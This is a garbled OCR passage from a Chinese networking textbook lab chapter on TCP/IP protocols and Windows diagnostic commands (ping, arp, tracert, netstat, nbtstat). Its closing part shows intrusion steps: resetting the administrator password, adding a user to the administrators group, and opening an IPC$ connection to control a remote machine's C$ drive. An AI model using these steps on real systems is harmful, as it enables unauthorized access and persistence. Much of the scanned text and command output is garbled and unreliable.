网 络 层 的 协议 ; 区 别 在 于 前 者 提供 的 服务 是 高 度 可 用 的 ,开销 比较 大 ,而 UDP 是 一 个 简单 
的 数据 报 转发 协议 , 比 TCP 要 复杂 .可 能 出 现 错误 ,但 比较 高 效 。 


4. 应 用 层 


TCP/IP 模型 的 应 用 层 协议 提供 了 远程 访问 和 资源 共享 ,包括 所 有 高 层 协 议 ,常用 的 有 
文件 传送 协议 、 远 程 登录 协议 .简单 邮件 传送 协议 等 。 在 这 里 的 协议 很 多 都 要 依赖 于 底层 提 


供 的 服务 。 


2.2.3 TCP/IP 应 用 层 中 的 常用 协议 


由 于 TCP/IP 的 应 用 层 协议 在 日 常 的 生活 中 接触 比较 多 ,这 里 将 对 其 中 一 些 较 常用 协 


实践 
议 进行 简 述 。 
1. 远程 登录 


远程 登录 (Remote Login) 协 议 可 以 实现 在 一 台 主 机 上 通过 网 络 远程 登录 到 其 他 任何 一 
台 网 络 主机 上 去 ,而 不 需要 为 每 一 台 主机 连接 一 个 硬件 终端 。 也 就 是 指 用 户 使 用 Telnet 命 
令 , 可 使 自己 的 计算 机 暂时 成 为 远程 主机 的 一 个 仿真 终端 。 


2. 文件 传送 协议 


文件 传送 协议 (FTP) 是 计算 机 之 间 文 件 传送 的 Internet 标准 。FTP 提供 交互 式 的 访 
Ta] ,允许 客户 指明 文件 的 类 型 和 格式 ,并 允许 文件 具有 存储 权限 (访问 的 用 户 一 般 需要 授权 ， 
并 输入 有 效 的 密码 )。FTP 屏蔽 了 各 个 计算 机 系统 的 细节 , 适 于 在 异 构 网 络 的 计算 机 之 间 
传送 文件 。 

FTP 的 工作 原理 主要 是 提供 文件 传送 的 一 些 基本 服务 , 它 使 用 了 TCP 协议 ,主要 的 应 
用 是 将 一 个 文件 从 一 台 计算 机 复制 到 另外 一 台 计 算 机 上 。 

FTP 主要 提供 的 功能 有 在 计算 机 之 间 交 换 一 个 或 多 个 文件 (是 复制 ,不 是 转移 ) ,能够 
传送 多 种 类 型 .多 种 结构 .多 种 格式 的 文件 ,具有 对 文件 进行 改名 、 显 示 内 容 、 改 变 属性 、 删 除 
等 操作 的 功能 ,等 等 。 


3. 简单 邮件 传送 协议 


简单 邮件 传送 协议 (SMTP) 使 用 的 也 是 TCP 协议 ,客户 端 向 服务 器 端 提出 连接 请 求 ， 
一 旦 连接 成 功 ,就 可 以 立即 进行 邮件 信息 交换 ,邮件 传送 结束 后 释放 连接 。SMTP 可 以 在 
不 同 的 网 络 情况 之 下 进行 邮件 的 通信 , 它 关 心 的 不 是 通信 的 进程 细节 ,而 是 邮件 是 否 到 达 目 
的 地 。 

很 多 操作 系统 都 采用 SMTP 作为 邮件 服务 的 协议 ,同时 ,所 有 操作 系统 也 都 具有 
SMTP 服务 器 。 
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【实验 目的 】 

CD 熟悉 常用 网 络 测试 命令 的 语法 及 其 功能 。 

(2) 掌握 常用 的 网 络 故 障 分 析 及 排除 方法 。 

【实验 内 容 】 

(1) 阅读 相关 参考 资料 ,学 习 常用 网 络 测试 命令 知识 。 

(2) 运行 常用 网 络 测试 命令 ,学 习 网 络 故障 排除 的 方法 ,对 运行 结果 进行 分 析 。 

(3) 通过 百度 等 搜索 引擎 搜索 其 他 一 些 网 络 测试 命令 或 专用 的 网 络 测 试 工具 软件 , 通 
过 运行 观察 其 结果 。 

【实验 步骤 】 

选择 “开始 一 运行 "命令 ,打开 “运行 "对话 框 ,在 “打开 ” 框 中 输入 CMD, 单 击 “ 确 定 ” 按 钮 
进入 DOS 界面 ,然后 按照 如 下 实验 步骤 进行 测试 “和 运行 对话 框 如 图 2-3 所 示 。 
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图 2-3 “运行 ”对话 框 
(1) 在 MSDOS 窗口 中 输入 “ping 127. 0.0.1” 测 试 本 机 网 卡 是 否 工作 正常 ,如 图 2-4 所 示 。 
[PE s -lol x 


C:\Docunents and SettingsSñdministrator>ping 127.0.0.1 


Pinging 127.8.0.1 vith 32 bytes of data: 


ply from 127.0.0.1: bytes-32 timeXins TIL-64 
le; 8.8.1: bytes-32 timeXins TIL-64 
ply from 127.8.8.1: bytes-32 time<ins TIL-64 
ply from 127.0.0.1: bytes-32 timeXins TIL-64 
Ping statistics for 127.0.0.1: 
Packets: Sent = 4, Received = 4, Lost = Ø (Øx loss), 
fpproxinate round trip times in milli-seconds: 
Minimum = @ms, Maximum = Bms, Average = gms 


C:\Documents and SettingsSñdministrator>_ 


图 2-4 测试 网 卡 工 作 状 态 


由 运行 结果 可 见 , 数 据 包 个 数 为 发 送 4 个 数据 包 , 共 回收 到 4 个 ,丢失 0 个 占 比 0; 最 快 
回收 时 间 为 0ms, 最 慢 回收 时 间 Oms, FEJRE A 0ms。 

从 这 里 可 以 得 出 结论 ,本 地 计算 机 TCP/IP 设置 正确 ,网 卡 工作 正常 。 

(2) 用 ipconfig 命令 查看 本 机 的 配置 信息 及 其 含义 。 

ipconfig 是 调试 计算 机 网 络 的 常用 命令 ,通常 使 用 它 显示 计算 机 中 网 络 适配器 的 IP 地 
址 、 子 网 掩 码 及 默认 网 关 、MAC 地 址 等 信息 。 例 如 ipcopfig/all 命令 即 用 于 显示 有 关 IP 地 
址 的 所 有 配置 信息 。 

(3) 用 ping 命令 测试 本 机 是 否 可 和 默认 网 关连 通 , 如 图 2-5 所 示 。 

从 结果 可 以 看 出 ,本 机 可 以 与 网 关连 通 。 

(4) 使 用 ping 命令 前 和 后 分 别 运行 arp -a 命令 ,记录 前 后 的 结果 。 

使 用 ping 命令 前 ,执行 arp -a 命令 后 只 有 1 条 记录 ,这 里 是 网 关 地 址 ,如 图 2-6 Bros 。 

【问题 2-1] 执行 ping 8. 8. 8. 8( 外 部 IP 地 址 ) 命 令 后 ,再 执行 arp -a 命令 ,发 现 仍然 是 
原来 的 一 条 IP 地 址 (网 关 地 址 )。 执 行 ping 网 络 邻 居 IP( 这 里 是 192. 168. 1. 101) 后 ,再 执 
行 arp -a 命令 ,发 现 增加 了 一 条 记录 信息 ,如 图 2-7 所 示 。 请 解释 其 中 的 原因 。 


实践 


:NDocuments and Settingsspc2>ping 192.168.1.1 


[Pinging 192.168.1.1 with 32 bytes of data: 


Reply from 192.168.1.1: bytes-32 time-4ns IIL-64 
Reply fron 192.168.1.1* butes=32 time=4ns IIL-64 
Reply from 192.168.1.1: bytes=32 time-2ns ITL=64 


Reply from 192.168.1.1: bytes=32 time-2ms IIL=64 


Ping statistics for 192.168.1.1: 

Packets: Sent = 4, Received = 4, Lost = B (Bx loss), 
fipproximate round trip tines in nilli-seconds: 

Minimum = 2ms, Maximun = 4ms, huerage = 3ns 


zNDocuments and Settingsspc2> 


图 2-5 测试 网 关连 通 状态 


:NDocuments and Settings5pc2>arp -a 


Interface: 192.168.1.106 --- 8x10004 
Internet fiddress Physical fiddress Type 
192.168.1.1 6c-e8-73-95-Af -e4 dynamic 


:ADocunents and Settings\pc2> 


图 2-6 执行 arp -a 命令 


C:\Documents and SettingaNpce2>ping B.8.8.8 
Pinging 8.8.8.8 vith 32 bytes of data: 


Reply fron 8.8.8.8: bytes-32 tine-65ms TIL-39 
Reply fron 8.8.8.8: butes-32 tine-66ms TII 
Reply fron 8.8.8.8: bytez-32 tine-Gins TIL-29 
Reply fron 8.8.8.8: bytes-32 tine-62ms TIL-39 


Ping statistics for 8.8.8.8: 


Packets: Sent = 4, Received = 4, Lost = 8 (@x loss) 


Approximate round trip times in milli-seconds 
Minimum = Gins, Maximun = 66ms, Average = 63ns 


C:\Documents and Settingspc2?arp -a 


Interface: 192.168.1.106 — &x10004 
Internet ñddress Physical ñddress Type 
192.188.1.1 6c-e8-73-95-4£-e4 dynamic 


G:XDoeumonta and Settings wpe25,, 


C:NDocunente and Settings pc2?ping 192.168.1.101 
Pinging 192.168.1.101 with 32 bytes of data: 


Reply from 192.168.1.101: 
Reply from 192.168.1.181 
Reply from 192.168.1.101 
Reply from 192.168.1.101 


bytes=32 time-712ns TIL«64 
bytes=32 time-4ns TTL=64 
bytes-32 time-3ns TTL=64 
bytez-32 time-4ms TTL-64 


Ping statistics for 192.168.1.1B1z 
Packets: Sent = 4. Received = 4, Lost = 8 (Bx loss). 
Approximate round trip times in nilli-seconds 


Mininum = 3ns, Maximum = 7i2ms, fweraue = i80ns 
C:\Documents and Settings*yc2?arp -a 
Interface: 192.168.1.106 —— 6x10884 
Internet Address Physical Address Type 
192.168.1.1 6c-e8-73-95-4£-e4 dunanic 
192.158.1.101 UB-1d-BF-B4-HF-a7 dynamic 


C:\Documents and Settings pe2> 


图 2-7 增加 了 一 条 记录 


(5) 执行 tracert 命令 ,记录 数据 包 到 达 目 标 主机 所 经 过 的 路 径 及 到 达 每 个 节点 的 时 


Te] ,查看 访问 网 易 或 其 他 网 站 的 路 由 ,如 图 2-8 所 示 。 


【命令 格式 】 


tracert www. 163. com( 外 网 ) 


C:\Documents and SettingsSpc2>tracert wwu.163.com 


Tracing route to 163.xduscache.glbB.lxdns.com [124.254.47.197] 
nver a maximum of 38 hops: 


4 3 ms 5 ms 2 ms 223.20.0.1 

2 17 ms 94 ns 3 ms 223.298.8.1 

3 3 ns 8 ns 2 ms 124.205.97.35 
4 4 ns 5 ns 4 ms 218.241.166.101 
5 64 ns 119 ns 93 ms 211.161.47.61 
6 6i ms 181 ms 102 ms 172.19.0.6 

了 5 ms 3 ms 4 ms 124.254.47.197 


Trace complete. 


C:\Documents and Settingspc2?, 


图 2-8 访问 网 易 的 路 由 


(6) 利用 netstat 命令 了 解 到 主机 与 Internet 的 连接 。 

【主要 功能 】 

该 命令 可 以 让 用 户 了 解 到 自己 的 主机 是 怎样 与 Internet 相连 接 的 。 
【命令 格式 】 


netstat [-r] [-s] [-n] [-a] 


【参数 介绍 】 
e r: 显示 本 机 路 由 表 的 内 容 , 如 图 2-9 所 示 。 


C:\Documents and Settings\pc2?>netstat -r 


Route Table 


Interface List 


Bd. .. MS TCP Loopback interface 

FT xd c6 58 47 9e ...... NUIDIR nForce Metworking Controller - 数据 包 计 划 
序 微 型 端口 

©x10094 ...00 14 78 13 27 07 ...... TL-WN321G USB Wireless Adapter - 数据 包 计划 

程序 微型 端口 


fictive Routes: 


Network Destination Netnask Gateway Interface Metric 
8.0.8.8 0.0.0.0 192.168.1.1 192-168-1-196 : 

127.8.0.0 255.8.8.8 127.8.0.1 127.0.8.1 1 
192.168.1.0 255.255.255.0 192.168.1.186 192.168.1.106 25 
192.168.1.186 255.255.255.255 127.8.0.1 127.0.8.1 25 
192.168.1.255 255.255.255.255 192.168.1.186 — 192.168.1.106 25 
224.0.0.0 240.0.0.0 192.168.1.1806  192.168.1.106 25 

255.255.255.255 255.255.255.255 192.168.1.186 2 3 

255.255.255.255 255.255.255.255 192.168.1.1806  192.168.1.106 1 


Default Gatewa: 192.168.1.1 


Persistent Routes: 
Mone 
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图 2-9 显示 路 由 表 内 容 


实践 


路 由 器 的 主要 工作 就 是 为 经 过 路 由 器 的 每 个 数据 帧 寻找 一 条 最 佳 传输 路 径 ,并 将 该 数 
据 有 效 地 传送 到 目的 站 点 。 由 此 可 见 , 路 由 算法 是 路 由 器 的 关键 所 在 。 为 了 完成 这 项 工作 ， 
路 由 器 中 保存 着 各 种 传输 路 径 的 相关 数据 一 一 路 由 表 (Routing Table) , 供 路 由 选择 时 使 
用 ,其 中 保存 着 子 网 的 标志 信息 、 网 上 路 由 器 的 个 数 和 下 一 个 路 由 器 的 名 字 等 内 容 。 路 由 表 
可 以 是 由 系统 管理 员 固定 设置 好 的 ,也 可 以 由 系统 动态 修改 ,还 可 以 由 路 由 器 自动 调整 ,也 
可 以 由 主机 控制 。 

° -s: 显示 每 个 协议 (包括 TCP, UDP IP) 的 使 用 状态 ,如 图 2-10 所 示 。 


C:\Documents and SettingsSpc2>netstat -s 
IPv4 Statistics 


Packets Received - 
Received Header Errors 

Received fddress Errors 

Datagrams Foruarded 

Unknown Protocols Received 
Received Packets Discarded 
Received Packets Delivered 

Output Requests 

Routing Discards 

Discarded Output Packets 

Output Packet No Route 
Reassenbly Required 

Reassenbly Successful 

Reassenbly Failures 

Datagrans Successfully Fragmented 
Datagmams Failing Fragmentation 
Fragments Created 


81618 


"a 


1688 
4297 


$5959o55995r9»oso2r 


ICMPu4 Statistics 


Messages 216 92 
Errors a a 


图 2-10 每 个 协议 的 使 用 状态 
"”-n: 以 数字 表格 形式 显示 地 址 和 端口 ,如 图 2-11 所 示 。 


C:\Documents and Settings\pc2>netstat -n 
fictive Connections 


Proto Local Address Foreign Address State 


TCP 127.0.0.1:10828 127.8.0.1:1834 ESTABLISHED 
TCP B.1:1B890 ESTABLISHED 
TCP G 1928 ESTABLISHED 
TCP 127.8.8.1:1828 127.8.0.1:1823 ESTABLISHED 
TCP — 192.168.1.106:1078 125.39.170.15:88080 ESTABLISHED 
TCP 192.168.1.106:1087 123.125.81.94:88 ESTABLISHED 
TCP — 192.168.1.106:2233 118.75.114.32:88 CLOSE WAIT 
TCP 192.168.1.106:2386 118.75.114.32:88 CLOSE WRIT 
TCP — 192.168.1.186:3776 42.120.85.5:88 CLOSE WAIT 
TCP 192.168.1.106:3825 221.176.31.204:80 CLOSE WRIT 
TCP — 192.168.1.106:4381 118.75.114.32:88 CLOSE WRIT 
TCP 192.168.1.186:4473 118.75.38.129:88 CLOSE WRIT 
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图 2-11 数字 格式 显示 地 址 和 端口 


toca: 显示 主机 的 所 有 端口 号 ,如 图 2-12 所 示 。 
(7) 利用 TracertGUI 路 由 可 视 化 查看 工具 检测 机 房 线路 到 骨干 线 经 过 了 多 少 节点 ,并 
且 显 示 到 节点 所 用 的 时 间 以 及 地 理 位 置 , 如 图 2-13、 图 2-14 所 示 。 


C:\Documents and Settings*pc2?netstat -a 


fictive Connections 


Proto 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 
UDP 
UDP 
UDP 


(8) 利用 nbtstat 命令 使 用 TCP/IP 上 的 NetBIOS 显示 协议 统计 和 当前 TCP/IP 连接 ， 
使 用 这 个 命令 可 以 得 到 远程 主机 的 NetBIOS 信息 ,比如 用 户 名 .所 属 的 工作 组 、 网 卡 的 


MAC 地 址 等 。 


Local Address 
pci:epnap 


nci :nicrosoft-i 


c1:2869 
pc1:1825 
pc1:1827 
pc1:1828 
c1:1028 
pcizi1829 
c1:1833 
pc1:1833 
pc1:1834 
pci:i898 


ds 


pci:netbios-ssn 


pci:1878 
nc1:1887 
pc1:2233 
c1:2386 
pc1:3776 
pc1:3825 
pciz4381 
pc1:4473 


pci:nicrosoft-ds 


pci:i83i 
pc1:1060 
pc1:1279 
pc1:1583 


ds Tracert 


Foreign Address 
pci:8 

pci:8 

pci:8 

pc1:8 

pci:8 

pci:8 
c1:1034 
pci:8 

pci:& 
pci:iB98 
pci:1028 
pci:i833 
pci:& 
no-data:8888 
123.125.81.9. 
118.25 114.3 
118.75.114.32:http 
42.128.85.5:http 
221.176.31.284:http 
110.75 114.3: 
110.75 .38.129:http 
m 

wx 

x: 

wx 

"x 


图 2-12 主机 的 所 有 端口 号 


Tracert with Location 


Tracing ro 
1 D 

uu 

1504 ms 

3 ms 

3 ms 

5 ms 

* 

4 ns 

Trace complete. 


8 ms 
Ars 
Tes 


3 ms 

II 

6 ms 

3 ms 

6 ms 

本 Request timed cut. B 
118.244 .253. 66 ”再 林 省 铁通 


Ses Bes 
118 244.253.868 ” 吉 补 省 铁通 


State 
IISTENING 
LISTENING 
IISTENING 
LISTENING 
LISTENING 
LISTENING 
ESTABLISHED 
LISTENING 
LISTENING 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
LISTENING 
ESTABLISHED 
ESTABLISHED 
CLOSF, MATT 
CLOSE_WAIT 
CLOSE_WAIT 
CLOSE_WAIT 
CLOSE_WAIT 
CLOSE_WAIT 
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图 2-13 TracertGUI 检测 国内 节点 


实践 


ds Tracert 


Tracert with Location 
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Domain Name or IP: EEC Tracert Copy 


图 2-14 TracertGUI 检测 经 过 国外 节点 信息 


° cai 使 用 这 个 参数 ,只 要 知道 了 远程 主机 的 机 器 名 称 , 就 可 以 得 到 它 的 NetBIOS 
信息 。 
* -A: 这 个 参数 也 可 以 得 到 远程 主机 的 NetBIOS 信息 ,但 需要 知道 它 的 IP. 
° -ni 列 出 本 地 机 器 的 NetBIOS 信息 。 
当 得 到 了 对 方 的 IP 或 者 机 器 名 的 时 候 , 就 可 以 使 用 nbtstat 命令 进一步 得 到 对 方 的 信 
息 ,这 又 增加 了 防止 入 侵 的 保险 系数 。 
(9) 利用 netstat 命令 查看 网 络 状 态 , 该 命令 操作 简便 功能 强大 。 
。 -a: 查看 本 地 机 器 的 所 有 开放 端口 ,可 以 有 效 发 现 和 预防 木马 ,可 以 知道 机 器 所 开 的 
服务 等 信息 ,格式 为 “netstat-aIP”。 
。 开 列 出 当前 的 路 由 信息 ,告诉 用 户 本 地 机 器 的 网 关 、 子 网 掩 码 等 信息 ,用 法 为 
"netstat-rIP" , 
(10) arp 命令 显示 和 修改 “地 址 解析 协议 (ARP)” 缓 存 中 的 项 目 。ARP 缓存 中 包含 一 
个 或 多 个 表 , 它 们 用 于 存储 IP 地 址 及 其 经 过 解析 的 以 太 网 或 令 牌 环 物理 地 址 。 计 算 机 上 安 
装 的 每 一 个 以 太 网 或 令 牌 环 网 络 适 配器 都 有 自己 单独 的 表 。 如 果 在 没有 参数 的 情况 下 使 
用 , 则 arp 命令 将 显示 帮助 信息 。 
【语法 】 


arp[ - a[InetAddr][ - NIfaceAddr]][ - g[ InetAddr][ — NIfaceAddr]][ — dInethddr[Ifacehddr]] 
[~ sInetAddrEtherAddr[ IfaceAddr]] 


【参数 】 
* -a[InetAddr][-NIfaceAddr]: 显示 所 有 接口 的 当前 ARP 缓存 表 。 要 显示 指定 IP 


地 址 的 ARP 缓存 项 ,请 使 用 带 有 InetAddr 参数 的 arp-a, 此 处 的 InecAddr 代表 指定 

的 IP 地 址 。 要 显示 指定 接口 的 ARP 缓存 表 , 请 使 用 -NIfaceAddr 参数 ,此 处 的 

IfaceAddr 代表 分 配给 指定 接口 的 IP 地 址 。-N 参数 区 分 大 小 写 。-g[ InetAddr] 

[-NIfaceAddr] 与 -a 相同 。 

-dInetAddr(IfaceAddr]: 删除 指定 的 IP 地 址 项 ,此 处 的 InetAddr 代表 IP 地 址 。 对 

于 指定 的 接口 ,要 删除 表 中 的 某 项 ,请 使 用 IfaceAddr 参数 ,此 处 的 IaceAddr 代表 

分 配给 该 接口 的 IP 地 址 ; 要 删除 所 有 项 ,请 使 用 星 号 通配符 ( * Of CRF InetAddr。 

* -sInetAddrEtherAddr[IfaceAddr]: 向 ARP 缓存 添加 可 将 IP 地 址 InetAddr 解析 成 
物理 地 址 EtherAddr 的 静态 项 。 要 向 指定 接口 的 表 添加 静态 ARP. 缓存 项 ,请 使 用 
IfaceAddr 参数 ,此 处 的 IfaceAddr 代表 分 配给 该 接口 的 IP 地 址 。 

° /3?: 在 命令 提示 符 显示 帮助 。 

【注释 】 

* InetAddr 和 IfaceAddr 的 IP 地 址 用 带 圆 点 的 十 进 制 记 数 法 表示 。 

* 物理 地 址 EtherAddr 由 6 个 字 节 组 成 ,这 些 字 节 用 十 六 进 制 记 数 法 表示 ,并 且 用 连 
字符 隔 开 (比如 00-AA-00-4F-2A-9C) 。 

* 通过 -s 参数 添加 的 项 属于 静态 项 ,它们 不 会 在 ARP 缓存 中 超时 。 如 果 终 止 TCP/IP 
协议 后 再 启动 ,这 些 项 会 被 删除 。 

【范例 】 
要 显示 所 有 接口 的 ARP 缓存 表 , 可 输入 如 下 命令 。 


arp-a 
对 于 指派 的 IP 地址 为 10.0.0. 99 的 接口 ,要 显示 其 ARP 缓存 表 , 可 输入 如 下 命令 。 
arp -a -N10.0.0.99 


要 添加 将 TP 地址 10. 0. 0. 80 解析 成 物理 地 址 00-AA-00-4F-2A-9C 的 静态 ARP 缓存 
项 ,可 输入 如 下 命令 。 


arp —s 10.0.0.80 00 - AA- 00 — 4F - 2A - 9C 


网 页 无 法 打开 


【解决 办 法 】 排除 法 。 先 排除 网 络 连通 故障 。 使 用 ping 实用 程序 测试 计算 机 名 和 IP 
地 址 ,如 果 能 够 成 功 校 验 IP 地 址 却 不 能 成 功 校 验 计算 机 名 , 则 说 明 名 称 解析 存在 问题 。 

(1) ping 127.0.0.1。127.0.0.1 是 本 地 循环 地 址 ,如 果 本 地 址 无 法 ping 通 , 则 表明 
本 地 机 TCP/IP 协议 不 能 正常 工作 。 输 入 “ping localhost” 同 时 也 可 以 检测 主机 文件 
(windows/hosts) 是 否 存 在 问题 。 正 常情 况 下 , HOSTS 文件 只 有 一 条 有 效 映 射 , 即 
“127. 0. 0. 1 localhost", 

(2) ping 本 机 的 IP HB jË. FH] IPConfig 查看 本 机 IP. #Ë Ji ping 该 P, 通 则 表明 网 络 适 
配器 (网 卡 或 MODEMD) 工 作 正常 ,不 通则 是 网 络 适配器 出 现 故 障 。 例 如 本 机 IP 地 址 为 
“192, 168. 0. 2”, 则 执行 命令 “ping 192. 168. 0. 2”。 如 果 在 MS-DOS 方式 下 执行 此 命令 , 显 


temas ens (EJ 
XE 


AVI £ 28 Request timed out, 则 表明 网 卡 安装 或 配置 有 问题 。 将 网 线 断 开 再 次 执行 此 命令 ， 
如 果 显 示 正 常 , 则 说 明 本 机 使 用 的 IP 地 址 可 能 与 男 一 台 正在 使 用 的 机 器 IP 地 址 重复 。 如 
果 仍 然 不 正常 , 则 表明 本 机 网 卡 安装 或 配置 有 问题 , 需 继 续 检 查 相 关 网 络 配置 。 

(3) ping 同 网 段 计算 机 的 IP. ping 一 台 同 网 段 计 算 机 的 IP, 不 通则 表明 网 络 线路 出 现 
故障 ; 若 网 络 中 还 包含 有 路 由 器 , 则 应 先 ping 路 由 器 在 本 网 段 端口 的 下 ,不 通则 此 段 线路 
有 问题 ; 通则 再 ping 路 由 器 在 目标 计算 机 所 在 网 段 的 端口 IP, 不 通则 是 路 由 出 现 故 障 ; 通 
则 再 ping 目的 机 IP 地 址 。 

(4) ping 网 关 IP。 假 定 网 关 IP 为 192. 168. 0. 1 , 则 执行 命令 “ping 192. 168. 0. 1”。 

(5) ping 远程 IP。 这 一 命令 可 以 检测 本 机 能 和 否 正 常 访问 Internet。 比 如 北京 工业 大 学 
的 IP 地 址 为 114. 251. 253. 101 ,在 MS-DOS 方式 下 执行 命令 “ping 114. 251. 253. 101”, 若 运 
行 正常 , 则 说 明 能 够 正常 接 人 互联 网 。 

(6) ping 网 址 。 比 如 “ping www. bjut. edu. cn”, 正 常情 况 下 会 出 现 该 网 址 所 指向 的 
IP, 这 表明 本 机 的 DNS 设置 正确 ,而 且 DNS 服务 器 工作 正常 ,反之 就 可 能 是 其 中 之 一 出 现 
了 故障 ; 同样 也 可 通过 ping 计算 机 名 检测 WINS 解析 的 故障 (WINS 是 将 计算 机 名 解析 到 
IP 地 址 的 服务 ) 。 

(7) 以 上 测试 都 通过 的 情况 下 可 以 考虑 为 浏览 器 的 问题 。 


两 台 主 机 只 能 单方 向 ping 通 


可 能 性 比较 大 原因 的 是 ping 不 通 的 那 台 主机 安装 了 个 人 防火 墙 。 在 共享 上 网 的 机 器 
中 ,出 于 安全 考虑 ,大 部 分 主机 都 安装 个 人 防火 墙 软件 。 几 乎 所 有 个 人 防火 墙 软件 默认 不 允 
许 其 他 机 器 ping 本 机 。 一 般 的 做 法 是 将 来 自 外 部 的 ICMP 请 求 报 文 滤 掉 ,对 本 机 出 去 的 
ICMP 请 求 报 文 以 及 来 自 外 部 的 ICMP 应 答 报 文 不 加 任何 限制 。 这 样 ,从 本 机 ping 其 他 机 
器 时 ,如 果 网 络 正常 ,就 没有 问题 。 但 如 果 从 其 他 机 器 ping 这 台 机 器 ,即使 网 络 一 切 正 常 ， 
也 会 出 现 * 超 时 无 应 答 ” 的 错误 。 另 外 ,如 果 是 多 网 卡 主机 ,如 果 IP 地 址 设置 错误 ,也 会 出 现 
以 上 现象 。 

[i98 2-2] 如 果 经 过 检测 确认 了 不 能 正常 上 网 的 原因 是 DNS 服务 器 故障 ,请 问 有 何 
解决 办 法 ? 

【问题 2-3】 如 果 ping 局 域 网 内 某 主机 返回 的 信息 中 *TTL=64”, 请 问 能 据 此 猜测 对 
方 使 用 的 操作 系统 吗 ? 


遭受 ARP 攻击 无 法 正常 上 网 


【解决 办 法 】 如 果 网 关 MAC 被 假冒 ,静态 绑 定 网 关 的 MAC 和 IP 地址 。 如 果 自 己 的 
MAC 被 假冒 攻击 ,紧急 情况 下 尝试 的 解决 办 法 是 修改 自己 的 MAC 地 址 一 一 本 地 管理 地 址 
(Locally Administered Address,LAA)。 根 据 具体 情况 执行 任务 2-1 和 2-2, 

【任务 2-1】 绑 定 网 关 的 MAC 和 IP 地址 。 假 设 已 知 网 关 的 IP 地 址 是 192. 168. 1. 1. 
网 关 MAC 地 址 是 AA-BB-CC-DD-EE-FF , 则 输入 的 命令 如 下 。 


ARP -S 192.168.1.1 AA- BB- CC- DD- EE- FF 
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【任务 2-2】 修改 MAC 地 址 。 

(1) 在 桌面 上 右 击 “网 上 邻居 ”图标 ,在 弹出 的 快捷 菜单 中 选择 “属性 ?命令 ,弹出 “网 络 
连接 ”对 话 框 , 右 击 “ 本 地 连接 ”图 标 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,弹出 “本 地 连接 
属性 ”对 话 框 , 单 击 * 配 置 ”按钮 ,在 打开 的 对 话 框 中 切换 到 “高 级 ”选项 卡 , 选 中 左 侧 “ 属 性 ” 列 
表 框 中 选择 Network Address (其 实 , 并 非 所 有 网 卡 对 物理 地 址 的 描述 都 用 Network 
Address, 如 Intel 的 网 卡 用 Locally Administered Address 来 描述 ) ,然后 选中 右 侧 * 值 ?选项 
栏 中 的 上 面 一 个 单 选项 ( 非 “ 不 存在 ”) ,在 右边 的 文本 框 中 输入 想 改 的 网 卡 MAC 地 址 ,形式 
如 001558E07A80, 然 后 单 击 “ 确 定 ” 按 钮 ,如 图 2-15 所 示 。 


T 


T 


Broadcom 了 etLink (TN) Gigabit Ethernet Ef Í? |) 


LONE MeF me MIER 
此 同 卡 可 使 用 下 列 原 性 。 在 左边 单 击 您 想 改 变 的 属性 ， 灼 后 在 
SEE CANA. 


av 
2] 


不 存在 中 


Locally Administered Address 
Speed à Duplex 

fake Up Capabilities 

FOL Speed 


图 2-15 “高 级 "选项 卡 


(2) 执行 “开始” 一“ 运行 ”命令 ,打开 “运行 ”对话 框 ,在 文本 框 中 输入 CMD 后 按 Enter 
键 ,然后 输入 IPCONFIG ,打开 的 窗口 如 图 2-16 所 示 


Ethernet adapter 本 地 


Connection-specific DNS Suffix 
Description : Broadcom MetLink «TM»? Gigabit Ethern| 


Physical fiddi 90-15-58—E8-70-88 
Dhcp Enabled. . No 

IP fiddre "- 192.168.13.55 
Subnet 

IP fddre- 


Default Gateway 
DNS Servers . . 


unnel adapter Teredo Tunneling Ps 


Connect pecific DNS Suffix 
Description . . Teredo Tunneling Pseudo-Interface 
Physical Addre: : Hü-Ug-B8-8n-o8-0a8-na-on 


图 2-16 验证 信息 


实践 


由 分 析 可 知 ,验证 修改 成 功 。 

(3) net 命令 的 功能 非常 强大 ,在 网 络 安全 领域 通常 用 来 查看 计算 机 上 的 用 户 列表 、 添 
加 和 删除 用 户 、 和 对 方 计算 机 建立 连接 、 启 动 或 者 停止 某 网 络 服务 等 。 

如 图 2-17 所 示 为 利用 net user 命令 查看 计算 机 上 的 用 户 列表 。 


G:Documents and Settings*pc2?net user 


pci 的 用 户 帐户 

Mdministrator ASPNET BE Quest i 
pc2 UIISR. 64560D1F03C5459 

命令 成 功 完成 。 


C:NDocunents and Settings pc2?, 


图 2-17 查看 用 户 列表 


利用 “net user 用 户 名 密码 ”命令 可 以 给 某 用 户 修改 密码 ,比如 把 管理 员 的 密码 修改 成 
123456, 如 图 2-18 所 示 。 


选 定 CNWINNTVSystem32VcmdLeke 
ES 

inet user administrator 123456 
命令 成 功 完成 。 


图 2-18 修改 密码 
【任务 2-3】 建立 用 户 并 添加 到 管理 员 组 ,如 图 2-19. [6 2-20 所 示 。 


net user jack 123456 /add 
net localgroup administrators jack /add 


net user 


图 2-19 建立 用 户 


:\net user jack 123456 /add 
fit RSS Ri 


:V net localgroup administrators jack /add 
命令 成 功 完成 。 


:Mnet user 


IUSR WlWFOX-NET 
IIWAM_WWWFOX-NET S0LDebugger 
sInternetUser 
命令 成 功 完成 。 
1 Dg 


图 2-20 ”添加 到 管理 员 组 


CD 和 对 方 计算 机 建立 信任 连接 。 

只 要 拥有 某 主 机 的 用 户 名 和 密码 ,就 可 以 用 IPC $ (Internet Protocol Control) 命令 建 
立信 任 连接 ,建立 完 信任 连接 后 ,可 以 在 命令 行 下 完全 控制 对 方 计算 机 。 

比如 得 到 IP 为 172. 18. 25. 109 计算 机 的 管理 员 密码 为 123456, 可 以 利用 指令 net use NN 
172.18. 25. 109Nipc $ 123456 /user:administrator 建立 信任 连接 ,如 图 2-21 所 示 。 


[5 CY WINNTVSystem32'.cmd.exe 


C:\>net use \\172.18.25.109\ipc$ 123456 /user:administrator 
命令 成 功 完成 。 


C: N> 


图 2-21 建立 信任 连接 


建立 完毕 后 ,就 可 以 操作 对 方 的 计算 机 ,比如 查看 对 方 计 算 机 上 的 文件 ,如 图 2-22 
所 示 。 


Seemnete -oj 
C:Vodir \\172.18.25.109\c$ = 


驱动 器 NN172.18.25.109Nc$. IEEE NUR ERE. 
ARESE BusF-6669 


NM 72.18.25.109Nc$. 的 目录 


2002-10-19 04:45a «DIR» WINNT 

2002-10-19 04:50a <DIR> Documents and Settings 

